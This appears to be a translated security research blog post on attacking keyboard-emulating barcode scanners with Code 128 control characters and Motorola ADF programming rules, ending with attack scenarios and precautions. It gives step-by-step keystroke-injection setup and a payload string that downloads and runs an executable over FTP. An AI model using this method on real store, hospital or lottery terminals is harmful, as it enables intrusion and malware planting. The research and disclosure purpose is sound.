Barcode is everywhere in our daily life, especially in supermarkets, convenience stores and logistics industry. However, is it safe? The barcode attack that @Tk described on PacSec and included in his demo video on twitter are so cool that I bought a scanner for research as well. During my research, I went through all information whether it is at home or abroad, but none covers the possible attack techniques. So here is one.
0x01 Introduction of Barcode
Barcodes are graphic identifiers used to represent a set of information by varying the widths and spacings of lines. Common barcodes are parallel lines constituted by black bars (abbreviated as bar) and white bars (abbreviated as space) that are with different reflectivity.
Here are several common types of barcode: code39, code128, code93, EAN128, EAN13 QR , etc. Most of them are one-dimensional, except for QR which is two-dimensional. This post mainly focuses on one-dimensional scanners. Code 128 is the one that is most widely used and supports most characters. Normally such attacks will exploit code 128 barcodes.
0x02 Introduction of the Scanner
Almost everyone has seen a barcode scanner in supermarkets, logistics, hospitals and lottery office. A scanner is used to read the information of a barcode. A conventional one often uses infrared ray to do that and its embedded chip outputs the result through processing. Some popular scanner brands in the world include Symbol, Honeywell and Datalogic. Amongst Symbol has been acquired by Motorola.
You’ll notice that when you pay the bill at the supermarket, the code of goods is displayed on the screen after scanning. Actually many scanners rely on keyboard for input, which means a scanner, in fact, is the equivalent of a keyboard. This is a huge risk.
0x03 Code 128 barcode
Since a scanner is a keyboard, any keyboard data can be entered by manipulating the data in barcodes. But, for example, UPC barcode only supports numbers and some may support numbers and letters, while code 128 is widely used because it supports ASCII 0-127 characters and that’s why it is called code 128. Barcode length is adjustable, which may support up to 232 characters.
Code 128 can be categorized into 3 groups:
- Code 128A: Standard numbers and uppercase letters, control characters, special characters
- Code 128B: Standard numbers and uppercase letters, lowercase letters, special characters
- Code 128C/EAN 128: number pair collections from  to , a total of 100, i.e., can only represent digital length of even numbers.
Code 128 consists of 4 parts: start code, data code, check code (optional) and end code.
As shown above, the barcode has different widths and spacings of parallel lines and consists of black lines (bar) and white lines (space). Based on the widths of each line, it can be interpreted as 211214. The first bar contains of two units of vertical lines, while the second space contains of one unit of vertical line, so on and so forth. Normally the first six bars and spaces are a cell. The logic code for 211214 is 11010010000, which is also the start code.
Comparison between start codes:
- 128A 11010000100
- 128B 11010010000
- 128C 11010011100
All end code is always 1100011101011.
According to the aforementioned logic code 11010010000, this barcode is a code128-B barcode.
In the end, the barcode data can be obtained through analysis based on the encoding table for code128.
0x04 Control characters and the production of barcodes
According to the above code128 rule, you may write a program that can read and generate barcodes. But our purpose is to execute some operations. The simplest way is to use control characters. Control characters are non-word characters, such as carriage returns, line feeds and tab characters. In ASCII, 0-31 and 127 are control characters.
Based on the control characters table of ASCII, almost all Ctrl+? Key combinations are included, such as Ctrl+O to open a file, but this is only a local shortcut key combination which can only be used only in certain applications, for example, in a Browser and MS Word. Some of the control characters can be used in some terminals making the program jump out of the sandbox. How do we generate a barcode that makes a computer execute Ctrl+O? Since the above introduces the algorithm for code 128, it’s time to write your program. There are also many small programs that can generate barcodes on the Internet. Here I recommend a powerful barcode editor: BarTender.
After installation, click “file”-“new”-“finish” and there is a blank template.
Then click the barcode button to create your barcode and select code 128.
Use BarTender to generate a barcode. Characters can be modified and debugged at any time. When scanning the above barcode, the scanner inputs “FutureSec” and outputs Ctrl+O.
After scanning, the scanner pops up a dialog box immediately.
Almost every scanner can execute it, because code 128 is supported by many scanners.
0x05 Advanced Data Formatting
Advanced Data Formatting (ADF) is an advanced input method developed by Motorola for scanners according to the rules you set for each step to customize input data, which can also be viewed as a barcode technique that supports programming.
For instance, within a check out system, when you scan a commodity, since check out system is not able to directly process the barcode, this technique is required. Check system identifier: A12345, which has to start with an A; data type of the barcode: 12345, pure numbers, in order to be identified by the check out system, it has to be processed before input.
Here is another example:
Output data from ADF:
How to implement ADF?
There are not any Chinese materials about ADF on the Internet. And only a few appears on some English websites. However, you’ll also be confused by @TK’s introduction about ADF in his PPT because of the lack of details. Later, I found a 300-page ADF guide from Motorola.
ADF is a programming method which you may construct based on your need and it uses barcode instead of code for programming. ADF represents all rules by using barcode, such as Prefix/Suffix, Replacement and Character Input.
Use ADF to hijack data of a scanner
Before set up ADF setting for the scanner, scan the start mode first. Begin new rule.
Then the scanned barcode will be added with a rule so long as the logic of the rule is legal.
Next scan the following barcodes in order
Then save the rule
When saving the rule, all output data of the scanner will be hijacked as “TEST”. If you set ADF, your rule will be executed step by step.
How to recover it?
Clear all barcodes with rule.
0x06 Use ADF to execute commands to plant malware
Since a command will be executed by solely using control characters and ADF supports simple programming and more keys, then system commands can be easily executed by using ADF. ADF supports more keys, for example, the most useful WIN+R.
It is named GUI R in ADF. Since WIN+R is supported, cmd will be executed by using the above rule. But this is not enough, because the input is completed by system which is faster than human input. When you reach GUI R and execute “c”, ”m”, “d”, cmd is already entered before the dialog box for win+r pops up. Therefore, time delay is required. And ADF supports it, which equals to sleep() in programming.
When inputing the ADF rule, two Numeric are entered as the scanning delay, such as, 0 and 1 which represent a delay of 0.1s; 0 and 5 equal to 0.5, the default values is 1 second.
If you know these ADF barcodes, you can construct a cmd popup and use control characters to execute commands that mainly include Enter. But if you do it as described above, it even requires 10 barcodes to pop a cmd box, which means the scanner has to repeat scanning for 10 times. Here is a demo from Tencent Xuan Wu Lab:
In the video, we used a pile of barcodes and scanned them for 10 times in sequence to get a cmd. This probably relates to the model of the scanner.
If it’s like this, whether rule generation or exploitation will be troublesome. As a matter of fact, this can be optimized to combine the rules of ADF by using the scanner software-123scan from Motorola.
123scan is a very powerful scanner management software by Motorola available at its official website. This software supports multiple functions. Next part is about how to use 123scan to set up ADF.
Open it and click "Create new configuration file"->"My scanner is NOT connected”->select scanner->"Modify data"->"Program complex data modifications"->"Create a new rule”.
Click on Add action to add a rule.
All ADF rules are included, including Beep control (control the buzzer for the scanner), Replace, etc.
Set a 0.5s delay and add rules in order.
Finally, all barcodes will be combined automatically and output.
The above is the barcode payload used to execute arbitrary commands. Except the first to set factory settings and the second to clear all rules, it only requires 4 barcodes to execute any single commands. “Send All that remains” represents the original data of barcodes after setting the ADF. Here os the ADF process for the above 4 barcodes: input WIN+R->delay 0.5s->input c->input m->input d->input Carriage Return->delay 0.5s->execute contents of the barcode, and the following Send ALL that remains is the command to execute for multi-line commands. If it’s single line command, 4 barcodes will be enough and Send ALL that remains will not be required.
Use ADF to plant malware
Since cmd commands are to execute, the simplest way is to use ftp to download and execute arbitrary applications. The aforementioned Send ALL that remains can use BarTender to generate FTP commands.
ftp test«CR»a«CR»a«CR»get w.exe«CR»bye«CR»w.exe«CR»get w.exe«CR»bye«CR»w.exe«CR»
The next is our demo video that has scanned ADF settings for 4 times. Whatever the barcode executes to Send All that remains. The video shows how to use FTP commands to execute.
(Tested model: Symbol-LS4208-SR20001ZZR)
0x07 Attack Scenarios
Next is a summary of the possible attack scenarios:
1.Pay a bill
Use barcode to replace commodities; Many convenience store supports WeChat, Ali Pay Barcode. The scanner supports multiple types of barcodes and it can scan the barcodes saved in the cell phone. Some markets equip with price query terminals. Use the terminal to scan a special barcode, you’ll be able to jump out of the terminal.
2.Hospital records, testing list
Nowadays, the register at a hospital and medical records both have a barcode. Autonomous terminals in the hospital support the barcode or you may hand it to a nurse. Almost every hospital has such terminals that can generate testing list by scanning the barcode.
Lottery tickets have barcodes. The inspecting machine requires the barcode to identify this ticket. So it’s possible to forge or attack an inspecting machine, there are many types of lottery terminals.
Express lists also use barcode, normally the barcode can be code 128 or code 39. Some self-help pickup cabinets may be risky.
There are many other scenarios that I won’t list here. If it’s possible, I’ll find another chance to analyze each scenario.
0x08 Precaution measures
- Disable ADF function of the scanner by default.
- Avoid using keyboard simulation of the scanner.
- Set up hotkey blacklist.
The concept of using barcode to launch attack is raised years ago, but no one digs deep. By using SQL barcode, it’s able to launch SQL injection, XSS and overflow attack.
Whatever the device is, once part of the input can be manipulated, it is risky.